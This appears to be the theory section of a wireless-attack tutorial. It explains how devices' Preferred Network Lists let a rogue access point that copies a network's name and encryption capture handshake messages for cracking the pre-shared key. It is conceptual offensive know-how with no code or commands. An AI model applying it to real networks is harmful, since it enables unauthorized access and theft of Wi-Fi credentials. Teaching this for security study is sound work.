Theory

When a client connects to a wireless network, the device will save the network into a list called the Preferred Network List (PNL), this list allows devices to reconnect to a familiar network whenever it is detected again, typically large wireless networks have multiple APs advertising the same ESSID, this allows the devices to connect to the network from multiple locations.

Let's imagine that the client is moving across a campus, the client in this case will walk in the ranges of multiple APs, but it will connect to the one with the stronger signal.

Even if we don't have the Pre-Shared Key (PSK) as the AP the client was expecting, we'll be able to capture the first two messages of the 4-way handshake, this information is enough for us to be able to crack the PSK, but many devices save the encryption details of the APs in the PNL when the network is saved, this means for our Rouge AP Attack to make a successful attack then it should match the encryption details of the target.